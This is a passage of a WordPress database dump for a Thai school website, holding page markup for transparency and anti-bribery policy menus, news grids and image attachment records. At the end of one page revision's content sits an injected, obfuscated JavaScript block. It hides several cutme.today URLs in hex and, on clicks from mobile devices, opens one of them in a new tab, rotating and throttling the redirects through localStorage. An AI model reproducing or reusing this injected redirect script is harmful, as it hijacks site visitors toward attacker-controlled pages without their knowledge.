900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:14:44','2024-07-27 05:14:44','',14,'http://pakhaeng.ssk.in.th/?p=143',0,'revision','',0),
(144,1,'2024-07-27 12:16:52','2024-07-27 05:16:52','','448905004_973201524597519_7994539186753533290_n','','inherit','','closed','','448905004_973201524597519_7994539186753533290_n','','','2024-07-27 12:16:52','2024-07-27 05:16:52','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n.jpg',0,'attachment','image/jpeg',0),
(145,1,'2024-07-27 12:17:01','2024-07-27 05:17:01','','Untitled','','inherit','','closed','','untitled','','','2024-07-27 12:17:01','2024-07-27 05:17:01','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png',0,'attachment','image/png',0),
(147,1,'2024-07-27 12:18:42','2024-07-27 05:18:42','','448905004_973201524597519_7994539186753533290_n','','inherit','','closed','','448905004_973201524597519_7994539186753533290_n-2','','','2024-07-27 12:18:42','2024-07-27 05:18:42','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg',0,'attachment','image/jpeg',0),
(148,1,'2024-07-27 12:18:47','2024-07-27 05:18:47','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\